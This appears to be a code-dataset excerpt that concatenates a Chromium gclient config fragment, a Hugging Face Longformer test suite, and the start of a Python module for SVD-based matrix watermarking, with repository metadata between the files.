  # Pin the main solution to HEAD and override ANGLE's DEPS pin.
  c.solutions[0].revision = 'HEAD'
  c.revisions['src/third_party/angle'] = 'HEAD'
@config_ctx()
def gerrit_test_cq_normal(c):
  # Checkout of the gerrit-cq playground repo used for CQ testing.
  soln = c.solutions.add()
  soln.name = 'gerrit-test-cq-normal'
  soln.url = 'https://chromium.googlesource.com/playground/gerrit-cq/normal.git'
# TODO(phajdan.jr): Move to proper repo and add coverage.
@config_ctx()
def valgrind(c):  # pragma: no cover
  """Add Valgrind binaries to the gclient solution."""
  c.solutions[0].custom_deps['src/third_party/valgrind'] = \
      ChromiumGitURL(c, 'chromium', 'deps', 'valgrind', 'binaries')
| 35.498466 | 80 | 0.7027 |
afbc812ae578c1c777d968fd5d61fa0ec8298a1f | 30,167 | py | Python | tests/test_modeling_longformer.py | gp201/transformers | 89f2781e87e92b04303f7f128107718e44e755ed | [
"Apache-2.0"
] | 1 | 2020-11-14T06:08:38.000Z | 2020-11-14T06:08:38.000Z | tests/test_modeling_longformer.py | gp201/transformers | 89f2781e87e92b04303f7f128107718e44e755ed | [
"Apache-2.0"
] | null | null | null | tests/test_modeling_longformer.py | gp201/transformers | 89f2781e87e92b04303f7f128107718e44e755ed | [
"Apache-2.0"
] | 2 | 2020-11-13T09:07:09.000Z | 2020-11-27T01:46:46.000Z | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers import is_torch_available
from transformers.testing_utils import require_sentencepiece, require_tokenizers, require_torch, slow, torch_device
from .test_configuration_common import ConfigTester
from .test_modeling_common import ModelTesterMixin, ids_tensor, random_attention_mask
if is_torch_available():
import torch
from transformers import (
LongformerConfig,
LongformerForMaskedLM,
LongformerForMultipleChoice,
LongformerForQuestionAnswering,
LongformerForSequenceClassification,
LongformerForTokenClassification,
LongformerModel,
LongformerSelfAttention,
)
class LongformerModelTester:
    """Builds a tiny random Longformer config plus matching inputs and runs
    shape checks for the base model and every task head.

    ``parent`` is the ``unittest.TestCase`` whose ``assert*`` methods are used
    for all checks.
    """

    def __init__(
        self,
        parent,
    ):
        self.parent = parent
        self.batch_size = 13
        self.seq_length = 7
        self.is_training = True
        self.use_input_mask = True
        self.use_token_type_ids = True
        self.use_labels = True
        self.vocab_size = 99
        self.hidden_size = 32
        self.num_hidden_layers = 5
        self.num_attention_heads = 4
        self.intermediate_size = 37
        self.hidden_act = "gelu"
        self.hidden_dropout_prob = 0.1
        self.attention_probs_dropout_prob = 0.1
        self.max_position_embeddings = 512
        self.type_vocab_size = 16
        self.type_sequence_label_size = 2
        self.initializer_range = 0.02
        self.num_labels = 3
        self.num_choices = 4
        self.scope = None
        self.attention_window = 4

        # `ModelTesterMixin.test_attention_outputs` is expecting attention tensors to be of size
        # [num_attention_heads, encoder_seq_length, encoder_key_length], but LongformerSelfAttention
        # returns attention of shape [num_attention_heads, encoder_seq_length, self.attention_window + 1]
        # because its local attention only attends to `self.attention_window + 1` locations
        # (assuming no token with global attention, otherwise the last dimension of attentions
        # is x + self.attention_window + 1, where x is the number of tokens with global attention)
        self.key_length = self.attention_window + 1

        # because of padding `encoder_seq_length`, is different from `seq_length`. Relevant for
        # the `test_attention_outputs` and `test_hidden_states_output` tests
        self.encoder_seq_length = (
            self.seq_length + (self.attention_window - self.seq_length % self.attention_window) % self.attention_window
        )

    def prepare_config_and_inputs(self):
        """Return a LongformerConfig and random ids/masks/labels for it."""
        input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)

        input_mask = None
        if self.use_input_mask:
            input_mask = random_attention_mask([self.batch_size, self.seq_length])

        token_type_ids = None
        if self.use_token_type_ids:
            token_type_ids = ids_tensor([self.batch_size, self.seq_length], self.type_vocab_size)

        sequence_labels = None
        token_labels = None
        choice_labels = None
        if self.use_labels:
            sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
            token_labels = ids_tensor([self.batch_size, self.seq_length], self.num_labels)
            choice_labels = ids_tensor([self.batch_size], self.num_choices)

        config = LongformerConfig(
            vocab_size=self.vocab_size,
            hidden_size=self.hidden_size,
            num_hidden_layers=self.num_hidden_layers,
            num_attention_heads=self.num_attention_heads,
            intermediate_size=self.intermediate_size,
            hidden_act=self.hidden_act,
            hidden_dropout_prob=self.hidden_dropout_prob,
            attention_probs_dropout_prob=self.attention_probs_dropout_prob,
            max_position_embeddings=self.max_position_embeddings,
            type_vocab_size=self.type_vocab_size,
            initializer_range=self.initializer_range,
            attention_window=self.attention_window,
            return_dict=True,
        )

        return config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels

    def create_and_check_attention_mask_determinism(
        self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
    ):
        # An all-ones attention mask must produce the same output as no mask.
        model = LongformerModel(config=config)
        model.to(torch_device)
        model.eval()

        attention_mask = torch.ones(input_ids.shape, dtype=torch.long, device=torch_device)
        output_with_mask = model(input_ids, attention_mask=attention_mask)["last_hidden_state"]
        output_without_mask = model(input_ids)["last_hidden_state"]
        self.parent.assertTrue(torch.allclose(output_with_mask[0, 0, :5], output_without_mask[0, 0, :5], atol=1e-4))

    def create_and_check_longformer_model(
        self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
    ):
        # Base model: check output shapes for all input combinations.
        model = LongformerModel(config=config)
        model.to(torch_device)
        model.eval()
        result = model(input_ids, attention_mask=input_mask, token_type_ids=token_type_ids)
        result = model(input_ids, token_type_ids=token_type_ids)
        result = model(input_ids)

        self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
        self.parent.assertEqual(result.pooler_output.shape, (self.batch_size, self.hidden_size))

    def create_and_check_longformer_model_with_global_attention_mask(
        self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
    ):
        # Base model with an explicit global attention mask on one position.
        model = LongformerModel(config=config)
        model.to(torch_device)
        model.eval()
        global_attention_mask = input_mask.clone()
        global_attention_mask[:, input_mask.shape[-1] // 2] = 0
        global_attention_mask = global_attention_mask.to(torch_device)

        result = model(
            input_ids,
            attention_mask=input_mask,
            global_attention_mask=global_attention_mask,
            token_type_ids=token_type_ids,
        )
        result = model(input_ids, token_type_ids=token_type_ids, global_attention_mask=global_attention_mask)
        result = model(input_ids, global_attention_mask=global_attention_mask)

        self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
        self.parent.assertEqual(result.pooler_output.shape, (self.batch_size, self.hidden_size))

    def create_and_check_longformer_for_masked_lm(
        self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
    ):
        model = LongformerForMaskedLM(config=config)
        model.to(torch_device)
        model.eval()
        result = model(input_ids, attention_mask=input_mask, token_type_ids=token_type_ids, labels=token_labels)
        self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))

    def create_and_check_longformer_for_question_answering(
        self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
    ):
        model = LongformerForQuestionAnswering(config=config)
        model.to(torch_device)
        model.eval()
        result = model(
            input_ids,
            attention_mask=input_mask,
            global_attention_mask=input_mask,
            token_type_ids=token_type_ids,
            start_positions=sequence_labels,
            end_positions=sequence_labels,
        )
        self.parent.assertEqual(result.start_logits.shape, (self.batch_size, self.seq_length))
        self.parent.assertEqual(result.end_logits.shape, (self.batch_size, self.seq_length))

    def create_and_check_longformer_for_sequence_classification(
        self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
    ):
        config.num_labels = self.num_labels
        model = LongformerForSequenceClassification(config)
        model.to(torch_device)
        model.eval()
        result = model(input_ids, attention_mask=input_mask, token_type_ids=token_type_ids, labels=sequence_labels)
        self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_labels))

    def create_and_check_longformer_for_token_classification(
        self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
    ):
        config.num_labels = self.num_labels
        model = LongformerForTokenClassification(config=config)
        model.to(torch_device)
        model.eval()
        result = model(input_ids, attention_mask=input_mask, token_type_ids=token_type_ids, labels=token_labels)
        self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.num_labels))

    def create_and_check_longformer_for_multiple_choice(
        self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
    ):
        config.num_choices = self.num_choices
        model = LongformerForMultipleChoice(config=config)
        model.to(torch_device)
        model.eval()
        # Expand every input to (batch, num_choices, seq_len).
        multiple_choice_inputs_ids = input_ids.unsqueeze(1).expand(-1, self.num_choices, -1).contiguous()
        multiple_choice_token_type_ids = token_type_ids.unsqueeze(1).expand(-1, self.num_choices, -1).contiguous()
        # NOTE: this statement was previously duplicated; the redundant copy
        # has been removed.
        multiple_choice_input_mask = input_mask.unsqueeze(1).expand(-1, self.num_choices, -1).contiguous()
        result = model(
            multiple_choice_inputs_ids,
            attention_mask=multiple_choice_input_mask,
            global_attention_mask=multiple_choice_input_mask,
            token_type_ids=multiple_choice_token_type_ids,
            labels=choice_labels,
        )
        self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_choices))

    def prepare_config_and_inputs_for_common(self):
        """Adapt prepare_config_and_inputs() to the (config, inputs_dict)
        shape expected by ModelTesterMixin."""
        config_and_inputs = self.prepare_config_and_inputs()
        (
            config,
            input_ids,
            token_type_ids,
            input_mask,
            sequence_labels,
            token_labels,
            choice_labels,
        ) = config_and_inputs
        global_attention_mask = torch.zeros_like(input_ids)
        inputs_dict = {
            "input_ids": input_ids,
            "token_type_ids": token_type_ids,
            "attention_mask": input_mask,
            "global_attention_mask": global_attention_mask,
        }
        return config, inputs_dict

    def prepare_config_and_inputs_for_question_answering(self):
        """Like prepare_config_and_inputs(), but rewrites the token ids so the
        sequence contains exactly three sep tokens (at the end), as the QA
        head expects."""
        config_and_inputs = self.prepare_config_and_inputs()
        (
            config,
            input_ids,
            token_type_ids,
            input_mask,
            sequence_labels,
            token_labels,
            choice_labels,
        ) = config_and_inputs

        # Replace sep_token_id by some random id
        input_ids[input_ids == config.sep_token_id] = torch.randint(0, config.vocab_size, (1,)).item()
        # Make sure there are exactly three sep_token_id
        input_ids[:, -3:] = config.sep_token_id
        input_mask = torch.ones_like(input_ids)

        return config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
@require_torch
class LongformerModelTest(ModelTesterMixin, unittest.TestCase):
    """Runs the shared ModelTesterMixin suite plus per-head shape checks for
    Longformer, delegating the actual work to LongformerModelTester."""

    test_pruning = False  # pruning is not supported
    test_headmasking = False  # head masking is not supported
    test_torchscript = False

    # Model classes exercised by the ModelTesterMixin tests (empty when
    # torch is unavailable so collection does not fail).
    all_model_classes = (
        (
            LongformerModel,
            LongformerForMaskedLM,
            LongformerForSequenceClassification,
            LongformerForQuestionAnswering,
            LongformerForTokenClassification,
            LongformerForMultipleChoice,
        )
        if is_torch_available()
        else ()
    )

    def setUp(self):
        self.model_tester = LongformerModelTester(self)
        self.config_tester = ConfigTester(self, config_class=LongformerConfig, hidden_size=37)

    def test_config(self):
        self.config_tester.run_common_tests()

    def test_longformer_model(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_longformer_model(*config_and_inputs)

    def test_longformer_model_attention_mask_determinism(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_attention_mask_determinism(*config_and_inputs)

    def test_longformer_model_global_attention_mask(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_longformer_model_with_global_attention_mask(*config_and_inputs)

    def test_longformer_for_masked_lm(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_longformer_for_masked_lm(*config_and_inputs)

    def test_longformer_for_question_answering(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs_for_question_answering()
        self.model_tester.create_and_check_longformer_for_question_answering(*config_and_inputs)

    def test_for_sequence_classification(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_longformer_for_sequence_classification(*config_and_inputs)

    def test_for_token_classification(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_longformer_for_token_classification(*config_and_inputs)

    def test_for_multiple_choice(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_longformer_for_multiple_choice(*config_and_inputs)
@require_torch
@require_sentencepiece
@require_tokenizers
class LongformerModelIntegrationTest(unittest.TestCase):
    """Numerical integration tests for Longformer's attention helpers, a
    single attention layer, and full pretrained checkpoints.

    Fix applied: several shape checks used ``self.assertTrue(x.shape, t)``.
    ``assertTrue``'s second positional argument is the failure *message*, so
    those checks always passed regardless of the shape.  They are now real
    ``assertEqual`` assertions, and the expected shape in
    ``test_pad_and_transpose_last_two_dims`` has been corrected to (1, 4, 8),
    which is what ``_get_hidden_states`` actually returns.
    """

    def _get_hidden_states(self):
        # One batch, four tokens, hidden size 8 -> shape (1, 4, 8).
        return torch.tensor(
            [
                [
                    [4.98332758e-01, 2.69175139e00, -7.08081422e-03, 1.04915401e00,
                     -1.83476661e00, 7.67220476e-01, 2.98580543e-01, 2.84803992e-02],
                    [-7.58357372e-01, 4.20635998e-01, -4.04739919e-02, 1.59924145e-01,
                     2.05135748e00, -1.15997978e00, 5.37166397e-01, 2.62873606e-01],
                    [-1.69438001e00, 4.17574660e-01, -1.49196962e00, -1.76483717e00,
                     -1.94566312e-01, -1.71183858e00, 7.72903565e-01, -1.11557056e00],
                    [5.44028163e-01, 2.05466114e-01, -3.63045868e-01, 2.41865062e-01,
                     3.20348382e-01, -9.05611176e-01, -1.92690727e-01, -1.19917547e00],
                ]
            ],
            dtype=torch.float32,
            device=torch_device,
        )

    def test_diagonalize(self):
        hidden_states = self._get_hidden_states()
        hidden_states = hidden_states.reshape((1, 8, 4))  # set seq length = 8, hidden dim = 4
        chunked_hidden_states = LongformerSelfAttention._chunk(hidden_states, window_overlap=2)
        window_overlap_size = chunked_hidden_states.shape[2]
        self.assertTrue(window_overlap_size == 4)

        padded_hidden_states = LongformerSelfAttention._pad_and_diagonalize(chunked_hidden_states)

        self.assertTrue(padded_hidden_states.shape[-1] == chunked_hidden_states.shape[-1] + window_overlap_size - 1)

        # first row => [0.4983, 2.6918, -0.0071, 1.0492, 0.0000, 0.0000, 0.0000]
        self.assertTrue(torch.allclose(padded_hidden_states[0, 0, 0, :4], chunked_hidden_states[0, 0, 0], atol=1e-3))
        self.assertTrue(
            torch.allclose(
                padded_hidden_states[0, 0, 0, 4:],
                torch.zeros((3,), device=torch_device, dtype=torch.float32),
                atol=1e-3,
            )
        )
        # last row => [0.0000, 0.0000, 0.0000, 2.0514, -1.1600, 0.5372, 0.2629]
        self.assertTrue(torch.allclose(padded_hidden_states[0, 0, -1, 3:], chunked_hidden_states[0, 0, -1], atol=1e-3))
        self.assertTrue(
            torch.allclose(
                padded_hidden_states[0, 0, -1, :3],
                torch.zeros((3,), device=torch_device, dtype=torch.float32),
                atol=1e-3,
            )
        )

    def test_pad_and_transpose_last_two_dims(self):
        hidden_states = self._get_hidden_states()
        # was: assertTrue(shape, (1, 8, 4)) -- never checked; actual is (1, 4, 8)
        self.assertEqual(hidden_states.shape, (1, 4, 8))
        padding = (0, 0, 0, 1)

        padded_hidden_states = LongformerSelfAttention._pad_and_transpose_last_two_dims(hidden_states, padding)
        # (1, 4, 8) padded to (1, 5, 8), then last two dims transposed.
        self.assertEqual(padded_hidden_states.shape, (1, 8, 5))

        expected_added_dim = torch.zeros((5,), device=torch_device, dtype=torch.float32)
        self.assertTrue(torch.allclose(expected_added_dim, padded_hidden_states[0, -1, :], atol=1e-6))
        self.assertTrue(torch.allclose(hidden_states[0, -1, :], padded_hidden_states.view(1, -1)[0, 24:32], atol=1e-6))

    def test_chunk(self):
        hidden_states = self._get_hidden_states()
        batch_size = 1
        seq_length = 8
        hidden_size = 4
        hidden_states = hidden_states.reshape((batch_size, seq_length, hidden_size))

        chunked_hidden_states = LongformerSelfAttention._chunk(hidden_states, window_overlap=2)

        # expected slices across chunk and seq length dim
        expected_slice_along_seq_length = torch.tensor(
            [0.4983, -0.7584, -1.6944], device=torch_device, dtype=torch.float32
        )
        expected_slice_along_chunk = torch.tensor(
            [0.4983, -1.8348, -0.7584, 2.0514], device=torch_device, dtype=torch.float32
        )

        self.assertTrue(torch.allclose(chunked_hidden_states[0, :, 0, 0], expected_slice_along_seq_length, atol=1e-3))
        self.assertTrue(torch.allclose(chunked_hidden_states[0, 0, :, 0], expected_slice_along_chunk, atol=1e-3))
        # was: assertTrue(shape, (1, 3, 4, 4)) -- never checked
        self.assertEqual(chunked_hidden_states.shape, (1, 3, 4, 4))

    def test_mask_invalid_locations(self):
        hidden_states = self._get_hidden_states()

        batch_size = 1
        seq_length = 8
        hidden_size = 4
        hidden_states = hidden_states.reshape((batch_size, seq_length, hidden_size))
        chunked_hidden_states = LongformerSelfAttention._chunk(hidden_states, window_overlap=2)

        hid_states_1 = chunked_hidden_states.clone()
        LongformerSelfAttention._mask_invalid_locations(hid_states_1, 1)
        self.assertTrue(torch.isinf(hid_states_1).sum().item() == 8)

        hid_states_2 = chunked_hidden_states.clone()
        LongformerSelfAttention._mask_invalid_locations(hid_states_2, 2)
        self.assertTrue(torch.isinf(hid_states_2).sum().item() == 24)

        hid_states_3 = chunked_hidden_states.clone()[:, :, :, :3]
        LongformerSelfAttention._mask_invalid_locations(hid_states_3, 2)
        self.assertTrue(torch.isinf(hid_states_3).sum().item() == 24)

        hid_states_4 = chunked_hidden_states.clone()[:, :, 2:, :]
        LongformerSelfAttention._mask_invalid_locations(hid_states_4, 2)
        self.assertTrue(torch.isinf(hid_states_4).sum().item() == 12)

    def test_layer_local_attn(self):
        model = LongformerModel.from_pretrained("patrickvonplaten/longformer-random-tiny")
        model.eval()
        layer = model.encoder.layer[0].attention.self.to(torch_device)
        hidden_states = self._get_hidden_states()
        batch_size, seq_length, hidden_size = hidden_states.size()
        attention_mask = torch.zeros((batch_size, seq_length), dtype=torch.float32, device=torch_device)
        attention_mask[:, -2:] = -10000

        is_index_masked = attention_mask < 0
        is_index_global_attn = attention_mask > 0
        is_global_attn = is_index_global_attn.flatten().any().item()

        output_hidden_states, _ = layer(
            hidden_states,
            attention_mask=attention_mask,
            is_index_masked=is_index_masked,
            is_index_global_attn=is_index_global_attn,
            is_global_attn=is_global_attn,
        )

        # was: assertTrue(shape, (1, 4, 8)) -- never checked
        self.assertEqual(output_hidden_states.shape, (1, 4, 8))
        self.assertTrue(
            torch.allclose(
                output_hidden_states[0, 1],
                torch.tensor(
                    [0.0019, 0.0122, -0.0171, -0.0256, -0.0300, 0.0173, -0.0115, 0.0048],
                    dtype=torch.float32,
                    device=torch_device,
                ),
                atol=1e-3,
            )
        )

    def test_layer_global_attn(self):
        model = LongformerModel.from_pretrained("patrickvonplaten/longformer-random-tiny")
        model.eval()
        layer = model.encoder.layer[0].attention.self.to(torch_device)
        hidden_states = torch.cat([self._get_hidden_states(), self._get_hidden_states() - 0.5], dim=0)
        batch_size, seq_length, hidden_size = hidden_states.size()
        attention_mask = torch.zeros((batch_size, seq_length), dtype=torch.float32, device=torch_device)

        # create attn mask
        attention_mask[0, -2:] = 10000.0
        attention_mask[0, -1:] = -10000.0
        attention_mask[1, 1:] = 10000.0

        is_index_masked = attention_mask < 0
        is_index_global_attn = attention_mask > 0
        is_global_attn = is_index_global_attn.flatten().any().item()

        output_hidden_states, _, _ = layer(
            hidden_states,
            attention_mask=attention_mask,
            is_index_masked=is_index_masked,
            is_index_global_attn=is_index_global_attn,
            is_global_attn=is_global_attn,
        )

        # was: assertTrue(shape, (2, 4, 8)) -- never checked
        self.assertEqual(output_hidden_states.shape, (2, 4, 8))

        self.assertTrue(
            torch.allclose(
                output_hidden_states[0, 2],
                torch.tensor(
                    [-0.0651, -0.0393, 0.0309, -0.0342, -0.0066, -0.0155, -0.0209, -0.0494],
                    dtype=torch.float32,
                    device=torch_device,
                ),
                atol=1e-3,
            )
        )

        self.assertTrue(
            torch.allclose(
                output_hidden_states[1, -2],
                torch.tensor(
                    [-0.0405, -0.0384, 0.0396, -0.0374, -0.0341, 0.0136, 0.0014, -0.0571],
                    dtype=torch.float32,
                    device=torch_device,
                ),
                atol=1e-3,
            )
        )

    def test_layer_attn_probs(self):
        model = LongformerModel.from_pretrained("patrickvonplaten/longformer-random-tiny")
        model.eval()
        layer = model.encoder.layer[0].attention.self.to(torch_device)
        hidden_states = torch.cat([self._get_hidden_states(), self._get_hidden_states() - 0.5], dim=0)
        batch_size, seq_length, hidden_size = hidden_states.size()
        attention_mask = torch.zeros((batch_size, seq_length), dtype=torch.float32, device=torch_device)

        # create attn mask
        attention_mask[0, -2:] = 10000.0
        attention_mask[0, -1:] = -10000.0
        attention_mask[1, 1:] = 10000.0

        is_index_masked = attention_mask < 0
        is_index_global_attn = attention_mask > 0
        is_global_attn = is_index_global_attn.flatten().any().item()

        output_hidden_states, local_attentions, global_attentions = layer(
            hidden_states,
            attention_mask=attention_mask,
            is_index_masked=is_index_masked,
            is_index_global_attn=is_index_global_attn,
            is_global_attn=is_global_attn,
        )

        self.assertEqual(local_attentions.shape, (2, 4, 2, 8))
        self.assertEqual(global_attentions.shape, (2, 2, 3, 4))

        # All tokens with global attention have weight 0 in local attentions.
        self.assertTrue(torch.all(local_attentions[0, 2:4, :, :] == 0))
        self.assertTrue(torch.all(local_attentions[1, 1:4, :, :] == 0))

        # The weight of all tokens with local attention must sum to 1.
        self.assertTrue(torch.all(torch.abs(global_attentions[0, :, :2, :].sum(dim=-1) - 1) < 1e-6))
        self.assertTrue(torch.all(torch.abs(global_attentions[1, :, :1, :].sum(dim=-1) - 1) < 1e-6))

        self.assertTrue(
            torch.allclose(
                local_attentions[0, 0, 0, :],
                torch.tensor(
                    [0.3328, 0.0000, 0.0000, 0.0000, 0.0000, 0.3355, 0.3318, 0.0000],
                    dtype=torch.float32,
                    device=torch_device,
                ),
                atol=1e-3,
            )
        )

        self.assertTrue(
            torch.allclose(
                local_attentions[1, 0, 0, :],
                torch.tensor(
                    [0.2492, 0.2502, 0.2502, 0.0000, 0.0000, 0.2505, 0.0000, 0.0000],
                    dtype=torch.float32,
                    device=torch_device,
                ),
                atol=1e-3,
            )
        )

        # All the global attention weights must sum to 1.
        self.assertTrue(torch.all(torch.abs(global_attentions.sum(dim=-1) - 1) < 1e-6))

        self.assertTrue(
            torch.allclose(
                global_attentions[0, 0, 1, :],
                torch.tensor(
                    [0.2500, 0.2500, 0.2500, 0.2500],
                    dtype=torch.float32,
                    device=torch_device,
                ),
                atol=1e-3,
            )
        )

        self.assertTrue(
            torch.allclose(
                global_attentions[1, 0, 0, :],
                torch.tensor(
                    [0.2497, 0.2500, 0.2499, 0.2504],
                    dtype=torch.float32,
                    device=torch_device,
                ),
                atol=1e-3,
            )
        )

    @slow
    def test_inference_no_head(self):
        model = LongformerModel.from_pretrained("allenai/longformer-base-4096")
        model.to(torch_device)

        # 'Hello world!'
        input_ids = torch.tensor([[0, 20920, 232, 328, 1437, 2]], dtype=torch.long, device=torch_device)
        attention_mask = torch.ones(input_ids.shape, dtype=torch.long, device=torch_device)

        output = model(input_ids, attention_mask=attention_mask)[0]
        output_without_mask = model(input_ids)[0]

        expected_output_slice = torch.tensor([0.0549, 0.1087, -0.1119, -0.0368, 0.0250], device=torch_device)
        self.assertTrue(torch.allclose(output[0, 0, -5:], expected_output_slice, atol=1e-4))
        self.assertTrue(torch.allclose(output_without_mask[0, 0, -5:], expected_output_slice, atol=1e-4))

    @slow
    def test_inference_no_head_long(self):
        model = LongformerModel.from_pretrained("allenai/longformer-base-4096")
        model.to(torch_device)

        # 'Hello world! ' repeated 1000 times
        input_ids = torch.tensor(
            [[0] + [20920, 232, 328, 1437] * 1000 + [2]], dtype=torch.long, device=torch_device
        )  # long input

        attention_mask = torch.ones(input_ids.shape, dtype=torch.long, device=input_ids.device)
        global_attention_mask = torch.zeros(input_ids.shape, dtype=torch.long, device=input_ids.device)
        global_attention_mask[:, [1, 4, 21]] = 1  # Set global attention on a few random positions

        output = model(input_ids, attention_mask=attention_mask, global_attention_mask=global_attention_mask)[0]

        expected_output_sum = torch.tensor(74585.8594, device=torch_device)
        expected_output_mean = torch.tensor(0.0243, device=torch_device)
        self.assertTrue(torch.allclose(output.sum(), expected_output_sum, atol=1e-4))
        self.assertTrue(torch.allclose(output.mean(), expected_output_mean, atol=1e-4))

    @slow
    def test_inference_masked_lm_long(self):
        model = LongformerForMaskedLM.from_pretrained("allenai/longformer-base-4096")
        model.to(torch_device)

        # 'Hello world! ' repeated 1000 times
        input_ids = torch.tensor(
            [[0] + [20920, 232, 328, 1437] * 1000 + [2]], dtype=torch.long, device=torch_device
        )  # long input
        input_ids = input_ids.to(torch_device)

        loss, prediction_scores = model(input_ids, labels=input_ids)

        expected_loss = torch.tensor(0.0074, device=torch_device)
        expected_prediction_scores_sum = torch.tensor(-6.1048e08, device=torch_device)
        expected_prediction_scores_mean = torch.tensor(-3.0348, device=torch_device)

        self.assertTrue(torch.allclose(loss, expected_loss, atol=1e-4))
        self.assertTrue(torch.allclose(prediction_scores.sum(), expected_prediction_scores_sum, atol=1e-4))
        self.assertTrue(torch.allclose(prediction_scores.mean(), expected_prediction_scores_mean, atol=1e-4))
| 42.850852 | 119 | 0.647462 |
74501855c5927294d55f392a675088ba65caa086 | 8,890 | py | Python | david/watermark.py | S-I-SVD/Randomized-SVD | 82108238a53c70938af87417f98aadc7f74b2a87 | [
"MIT"
] | 1 | 2021-12-09T13:34:44.000Z | 2021-12-09T13:34:44.000Z | david/watermark.py | S-I-SVD/Randomized-SVD | 82108238a53c70938af87417f98aadc7f74b2a87 | [
"MIT"
] | null | null | null | david/watermark.py | S-I-SVD/Randomized-SVD | 82108238a53c70938af87417f98aadc7f74b2a87 | [
"MIT"
] | null | null | null | import numpy as np
import numpy.linalg as la
import matplotlib.pyplot as plt
import svd_tools as svdt
import scipy as sp
import scipy.sparse
from PIL import Image
'''
Embed a watermark using the Liu & Tan algorithm
'''
def embed_watermark_liutan(mat, watermark, scale=1):
    '''
    Embed a watermark in a matrix using the Liu & Tan watermarking scheme
    (Algorithm 2.2 in the paper).

    Args:
        mat: Host matrix A that receives the watermark.
        watermark: Watermark matrix W; must fit inside `mat`.
        scale: Embedding strength (alpha in Algorithm 2.2).

    Returns: (A_W, U_W, S, (V_W)^T) -- the watermarked matrix plus the side
    information later consumed by extract_watermark_liutan.
    '''
    n_rows, n_cols = mat.shape
    wm_rows, wm_cols = watermark.shape
    if n_rows < wm_rows or n_cols < wm_cols:
        print('Watermark must be smaller than matrix')
        return

    # S: rectangular "diagonal" matrix holding the singular values of A.
    host_u, host_sv, host_vh = la.svd(mat)
    host_s = np.zeros((n_rows, n_cols))
    np.fill_diagonal(host_s, host_sv)

    # Zero-pad W to the host's shape and perturb S by alpha * W.
    padded_wm = np.zeros((n_rows, n_cols))
    padded_wm[:wm_rows, :wm_cols] = watermark
    perturbed_s = host_s + scale * padded_wm

    # The SVD of the perturbed singular-value matrix yields the key factors.
    wm_u, wm_sv, wm_vh = la.svd(perturbed_s)
    wm_s = np.zeros((n_rows, n_cols))
    np.fill_diagonal(wm_s, wm_sv)

    # Recombine with the host's singular vectors to form the watermarked matrix.
    watermarked = host_u @ wm_s @ host_vh
    return watermarked, wm_u, host_s, wm_vh
embed_watermark = embed_watermark_liutan
def extract_watermark_liutan(mat_watermarked, watermarked_u, mat_s_matrix, watermarked_vh, scale):
    '''
    Extract a watermark from a matrix using the Liu & Tan watermarking scheme
    (Algorithm 2.3 in the paper).

    Args:
        mat_watermarked: The watermarked matrix (possibly attacked).
        watermarked_u: U_W returned by embed_watermark_liutan.
        mat_s_matrix: Singular-value matrix S of the original host matrix.
        watermarked_vh: (V_W)^T returned by embed_watermark_liutan.
        scale: Embedding strength alpha used when embedding.

    Returns: The recovered (padded) watermark.
    '''
    # Only the singular values of the watermarked matrix are needed.
    sv = la.svd(mat_watermarked)[1]
    n_rows, n_cols = mat_watermarked.shape
    s_full = np.zeros((n_rows, n_cols))
    np.fill_diagonal(s_full, sv)
    # U_W * diag(sv) * (V_W)^T reconstructs S + alpha * W; undo S and alpha.
    reconstructed = watermarked_u @ s_full @ watermarked_vh
    return (reconstructed - mat_s_matrix) / scale
extract_watermark = extract_watermark_liutan
def embed_watermark_jain(mat, watermark, scale=1, term=False):
    '''
    Embed a watermark in a matrix using the Jain et al watermarking scheme.
    Corresponds to Algorithm 2.4 in the paper.

    Args:
        mat: The matrix in which to embed the watermark (A in Algorithm 2.4)
        watermark: The watermark to embed in the matrix (W in Algorithm 2.4)
        scale: Scaling factor (alpha in Algorithm 2.4)
        term: If True, also return the "Jain term" (the term added to A in
            Equation 3.1) alongside the watermarked matrix and the key.

    Returns: (A_W, (V_W)^T) and, when term is True, additionally the Jain
    term (corresponding to the symbols in Algorithm 2.4).
    '''
    mat_rows, mat_columns = mat.shape
    watermark_rows, watermark_columns = watermark.shape
    if mat_rows < watermark_rows or mat_columns < watermark_columns:
        print('Watermark must be smaller than matrix')
        return

    mat_u, mat_s, mat_vh = la.svd(mat)
    mat_num_sv = len(mat_s)
    # Rectangular "diagonal" singular-value matrix S of A.
